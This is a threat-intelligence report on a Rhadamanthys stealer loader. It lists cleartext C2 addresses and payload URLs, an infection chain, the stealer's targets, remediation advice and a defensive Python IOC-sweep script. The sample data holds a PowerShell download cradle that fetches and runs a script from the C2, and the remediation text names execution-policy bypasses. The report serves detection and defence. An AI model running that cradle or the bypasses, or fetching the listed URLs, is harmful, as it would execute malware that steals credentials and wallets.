Manual Static Analysis (LLM-Assisted) — Rhadamanthys Stealer Loader | Threat: CRITICAL
File Identity
SHA256        a793c1a77afeb7d85ee525d6333339e40e2fec841a9d79d1a5dbc432e2aa31ae
Filename      metacore-loader.exe
Size          171,520 bytes
String count  1,176
Cleartext C2 and Payload URLs
Key IOC: in this Rhadamanthys loader sample the C2 IP address and the full payload URLs are stored as cleartext strings, so they can be recovered from the binary by string extraction alone, without unpacking or executing the sample.
C2 server: 176.46.152.62
Port: 5858
Protocol: HTTP (no TLS; the full request path is visible to any proxy or IDS on the path)
Payload download URL:
http://176.46.152.62:5858/1319b3326c0848af967bbe7a51cf8c9a_crypted_build.exe
PowerShell script URL:
http://176.46.152.62:5858/dadaasads_new.ps1
Infection Chain
The loader (metacore-loader.exe) is executed on the target system.
It downloads the crypted Rhadamanthys payload from the C2 server at 176.46.152.62:5858 over plain HTTP.
From the same C2 it fetches the PowerShell script dadaasads_new.ps1 and runs it for follow-on actions (the script's contents were not part of this analysis).
The _crypted_build suffix in the payload filename indicates the stealer build was run through a crypter (a packer/obfuscation layer applied before hosting). The hosted file will therefore not match hashes of the unpacked Rhadamanthys stealer, and the real payload has to be recovered from memory after the crypter stub unpacks it.
Rhadamanthys Capabilities (Family)
Category        Targets
Browsers        100+ browsers — passwords, cookies, credit cards, session tokens
Crypto wallets  MetaMask, Exodus, Atomic, Electrum, 30+ wallet extensions
Email           Outlook, Thunderbird — credentials
VPN             NordVPN, ProtonVPN, OpenVPN configuration files
2FA             Google Authenticator, Authy seeds
System          Screenshots, system information, hardware fingerprint
About Rhadamanthys
Rhadamanthys is an advanced C++ infostealer sold as Malware-as-a-Service (MaaS) that first appeared in 2022. It stands out for its plugin-based architecture, support for 100+ browsers and its anti-analysis techniques, and it can load plugins through an embedded LuaJIT scripting engine. It is positioned in the underground market as one of the most expensive and most advanced stealers.
Detection / Remediation
Block or alert on traffic to 176.46.152.62:5858 at the network layer. Because the C2 speaks plain HTTP, proxy and IDS logs also record the full request path, so match on the two payload URLs as well as on the IP, and search historical logs for earlier contact.
Do not rely on PowerShell execution policy to stop unauthorized .ps1 files: it is a convenience setting, not a security boundary, and is bypassed trivially (for example with -ExecutionPolicy Bypass, or by piping the downloaded script text to Invoke-Expression). Restrict script execution with AppLocker/WDAC or Constrained Language Mode, and enable script block logging (Event ID 4104) so a download cradle that references the C2 is recorded.
Add the IP, both URLs and the SHA256 hash to EDR/SIEM block and watch lists.
On affected systems, treat every browser-stored credential, cookie and session token as compromised: reset passwords, revoke active sessions, and move funds out of any crypto wallet whose seed or keystore was present on the host.
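The following sweep turns the indicators from the cleartext-C2 section and the detection list above into something that can be run over exported logs. It is an added example, not KEYDAL's tooling: it checks web-proxy log lines (URL-level, since the C2 is plain HTTP) and PowerShell script-block text (Event ID 4104) for contact with the C2, and it matches in tiers so that a new path or port on the same host is still surfaced. The proxy log layout and every sample log line in it are constructed for this example.

```python
"""
IOC sweep for the Rhadamanthys loader described on this page.

Added example (not KEYDAL's tooling). Two evidence sources are checked against
the sample's indicators: web-proxy / firewall log lines and PowerShell
script-block text (Event ID 4104). The proxy log format and all sample log
lines below are constructed for this example.
"""
import re
from dataclasses import dataclass

# Indicators from the analysis above.
C2_IP = "176.46.152.62"
C2_PORT = 5858
PAYLOAD_PATHS = {
    "/1319b3326c0848af967bbe7a51cf8c9a_crypted_build.exe",
    "/dadaasads_new.ps1",
}
SAMPLE_SHA256 = "a793c1a77afeb7d85ee525d6333339e40e2fec841a9d79d1a5dbc432e2aa31ae"

# Assumed proxy log layout: <timestamp> <client> <method> <url> <status>
PROXY_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)
URL_RE = re.compile(
    r"^(?P<scheme>https?)://(?P<host>[^/:\s]+)(?::(?P<port>\d+))?(?P<path>/[^\s\"']*)?"
)


@dataclass
class Hit:
    source: str    # "proxy" or "ps-4104"
    client: str    # client IP or hostname
    reason: str    # why it matched
    evidence: str  # the URL that matched


def check_url(url: str):
    """Return a match reason if the URL touches the C2, else None.

    Tiered: a known payload path is the strongest signal, then the C2 host on
    its known port, then any contact with the C2 host at all (port and path
    can change between campaigns; the host is still the indicator).
    """
    m = URL_RE.match(url)
    if not m or m.group("host") != C2_IP:
        return None
    port = int(m.group("port") or (443 if m.group("scheme") == "https" else 80))
    path = m.group("path") or "/"
    if path in PAYLOAD_PATHS:
        return f"known payload path {path}"
    if port == C2_PORT:
        return f"C2 host on port {C2_PORT}"
    return "C2 host, unknown port/path"


def scan_proxy(lines):
    """Parse proxy log lines and return Hits for requests that reach the C2."""
    hits = []
    for line in lines:
        m = PROXY_LINE.match(line.strip())
        if not m:
            continue  # unparseable line: skipped, not silently treated as clean
        reason = check_url(m.group("url"))
        if reason:
            hits.append(Hit("proxy", m.group("client"), reason, m.group("url")))
    return hits


def scan_powershell(events):
    """events: iterable of (hostname, script_block_text) from Event ID 4104."""
    hits = []
    for host, text in events:
        for url in re.findall(r"https?://[^\s\"')]+", text):
            reason = check_url(url)
            if reason:
                hits.append(Hit("ps-4104", host, reason, url))
    return hits


def matches_sample_hash(sha256: str) -> bool:
    """Case-insensitive comparison against the loader's SHA256."""
    return sha256.strip().lower() == SAMPLE_SHA256


# Constructed sample data for the example (not real telemetry).
PROXY_LOG = [
    "2024-01-01T10:00:01Z 10.0.0.15 GET http://176.46.152.62:5858/1319b3326c0848af967bbe7a51cf8c9a_crypted_build.exe 200",
    "2024-01-01T10:00:02Z 10.0.0.15 GET http://176.46.152.62:5858/dadaasads_new.ps1 200",
    "2024-01-01T10:00:03Z 10.0.0.22 GET https://www.example.com/index.html 200",
    "2024-01-01T10:00:04Z 10.0.0.31 GET http://176.46.152.62/login 404",
]
PS_EVENTS = [
    ("WS-015", "IEX (New-Object Net.WebClient).DownloadString('http://176.46.152.62:5858/dadaasads_new.ps1')"),
    ("WS-022", "Get-ChildItem C:\\Users | Measure-Object"),
]

if __name__ == "__main__":
    for hit in scan_proxy(PROXY_LOG) + scan_powershell(PS_EVENTS):
        print(f"[{hit.source}] {hit.client}: {hit.reason} <- {hit.evidence}")
```

Run as-is it reports the two payload downloads from 10.0.0.15, the weaker "C2 host, unknown port/path" hit for 10.0.0.31 (same host, port 80, unknown path), and the download cradle in the WS-015 script block; the benign lines produce nothing. To use it on real data, feed `scan_proxy` the exported lines in the assumed layout (or adjust `PROXY_LINE` to your proxy's format) and `scan_powershell` the 4104 ScriptBlockText values.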
IOC
SHA256 a793c1a77afeb7d85ee525d6333339e40e2fec841a9d79d1a5dbc432e2aa31ae
C2 IP 176.46.152.62
C2 Port 5858
Payload URL http://176.46.152.62:5858/1319b3326c0848af967bbe7a51cf8c9a_crypted_build.exe
PS URL http://176.46.152.62:5858/dadaasads_new.ps1
Rhadamanthys — Malware Profile
Rhadamanthys is a premium C++ infostealer family that appeared in 2022, sold by subscription at 250 USD/month. It targets browsers, crypto wallets, FTP clients, VPN clients, email clients and gaming platforms, and uses a loader + stealer DLL architecture.
Technical Details
C++; HTTP/HTTPS C2; modular plugin-based architecture; broad browser credential theft; crypto wallet scraper (MetaMask/Phantom); steganography-backed payload delivery; host fingerprinting (UUID/HWID); process injection
Capabilities & Behavior
Browser credentials
FTP/SSH client passwords
IOC List (1 indicator)
Type    Value
sha256  a793c1a77afeb7d85ee525d6333339e40e2fec841a9d79d1a5dbc432e2aa31ae
C2 Servers
(4 recorded servers for this family; Status reflects the most recent check, so an inactive C2 should still be blocked and hunted for in historical logs, since infrastructure is routinely reactivated or reused)
Address          Type  Port  Protocol  Status    Country
94.131.106.195   ip    443   HTTPS     inactive  RU
185.106.122.144  ip    443   HTTPS     inactive  CZ
185.106.120.55   ip    80    HTTP      inactive  RU
176.46.152.62    ip    5858  HTTP      inactive  —
C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.